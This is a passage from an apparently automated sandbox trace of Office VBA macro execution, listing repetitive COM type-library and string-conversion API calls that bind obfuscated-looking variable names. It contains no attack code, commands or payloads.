pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.414] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.414] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.414] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_WADcQGZ", lHashVal=0x10425f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.414] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.414] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.414] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_WADcQGZ", lHashVal=0x10425f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.414] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.414] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.414] IUnknown:Release (This=0x665ba50) returned 0xd [0069.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b129ee, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_WADcQGZ") returned 15 [0069.414] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_WADcQGZ", lHashVal=0x10425f, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x57005f00720061, ppTypeComp=0x51006300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x57005f00720061, ppTypeComp=0x51006300000000, pDummy=0x0) returned 0x0 [0069.414] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b8099e | out: _Dst=0x144ec0) returned 0x0 [0069.414] ITypeComp:RemoteBind (in: This=0x665ba60, szName="QCDDAD", lHashVal=0x104655, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b809c6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="QCDDAD") returned 7 [0069.414] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="QCDDAD", lHashVal=0x104655, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b809c6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="QCDDAD") returned 7 [0069.414] ITypeComp:RemoteBind (in: This=0x665bd30, szName="QCDDAD", lHashVal=0x104655, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.414] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="QCDDAD") returned 0x104655 [0069.414] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="QCDDAD" | out: _Dst="QCDDAD") returned 0x0 [0069.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="QCDDAD") returned 7 [0069.414] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.415] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="QCDDAD", lHashVal=0x104655, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.415] IUnknown:Release (This=0x665ba50) returned 0xd [0069.415] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.415] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="QCDDAD", lHashVal=0x104655, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.415] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.415] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.415] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="QCDDAD", lHashVal=0x104655, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.415] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.415] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.415] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="QCDDAD", lHashVal=0x104655, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.415] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b809c6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="QCDDAD") returned 7 [0069.415] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="QCDDAD", lHashVal=0x104655, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.415] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.415] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b809c6 | out: _Dst=0x67c2d40) returned 0x0 [0069.415] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_QCDDAD") returned 0x10c0fe [0069.415] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_QCDDAD" | out: _Dst="_B_var_QCDDAD") returned 0x0 [0069.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_QCDDAD") returned 14 [0069.415] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.415] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_QCDDAD", lHashVal=0x10c0fe, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.415] IUnknown:Release (This=0x665ba50) returned 0xd [0069.415] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.415] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_QCDDAD", lHashVal=0x10c0fe, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.415] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.415] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.415] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_QCDDAD", lHashVal=0x10c0fe, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.415] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.415] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.415] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_QCDDAD", lHashVal=0x10c0fe, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.416] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.416] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.416] IUnknown:Release (This=0x665ba50) returned 0xd [0069.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12a1e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_QCDDAD") returned 14 [0069.416] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_QCDDAD", lHashVal=0x10c0fe, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x51005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x51005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0) returned 0x0 [0069.416] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b809c6 | out: _Dst=0x144ec0) returned 0x0 [0069.416] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.416] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.416] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.416] IUnknown:Release (This=0x665ba50) returned 0xd [0069.416] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.416] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.416] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.416] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.416] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.416] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.416] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.416] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.416] IUnknown:Release (This=0x665ba50) returned 0xd [0069.416] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.416] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.416] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.416] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.417] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.417] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.417] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.417] IUnknown:Release (This=0x665ba50) returned 0xd [0069.417] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.417] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.417] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.417] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.417] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.417] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.417] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.417] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.417] IUnknown:Release (This=0x665ba50) returned 0xd [0069.417] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.417] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.417] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.417] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.417] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.417] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.417] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.417] IUnknown:Release (This=0x665ba50) returned 0xd [0069.417] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.417] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.418] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.418] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.418] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.418] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.418] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.418] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.418] IUnknown:Release (This=0x665ba50) returned 0xd [0069.418] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.418] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.418] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.418] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.418] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.418] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.418] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.418] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.418] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.418] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.418] IUnknown:Release (This=0x665ba50) returned 0xd [0069.418] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.418] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.418] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.419] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.419] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.419] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.419] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.419] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.419] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.419] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.419] IUnknown:Release (This=0x665ba50) returned 0xd [0069.419] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.419] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.419] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80926, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="vXCAQ_A") returned 8 [0069.419] ITypeComp:RemoteBind (in: This=0x665ba60, szName="vXCAQ_A", lHashVal=0x102ecd, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80926, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="vXCAQ_A") returned 8 [0069.419] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="vXCAQ_A", lHashVal=0x102ecd, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80926, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="vXCAQ_A") returned 8 [0069.419] ITypeComp:RemoteBind (in: This=0x665bd30, szName="vXCAQ_A", lHashVal=0x102ecd, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.419] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vXCAQ_A") returned 0x102ecd [0069.419] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="vXCAQ_A" | out: _Dst="vXCAQ_A") returned 0x0 [0069.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="vXCAQ_A") returned 8 [0069.419] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.420] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="vXCAQ_A", lHashVal=0x102ecd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.420] IUnknown:Release (This=0x665ba50) returned 0xd [0069.420] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.420] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="vXCAQ_A", lHashVal=0x102ecd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.420] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.420] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.420] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="vXCAQ_A", lHashVal=0x102ecd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.420] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.420] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.420] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="vXCAQ_A", lHashVal=0x102ecd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.420] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80926, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="vXCAQ_A") returned 8 [0069.420] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="vXCAQ_A", lHashVal=0x102ecd, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, 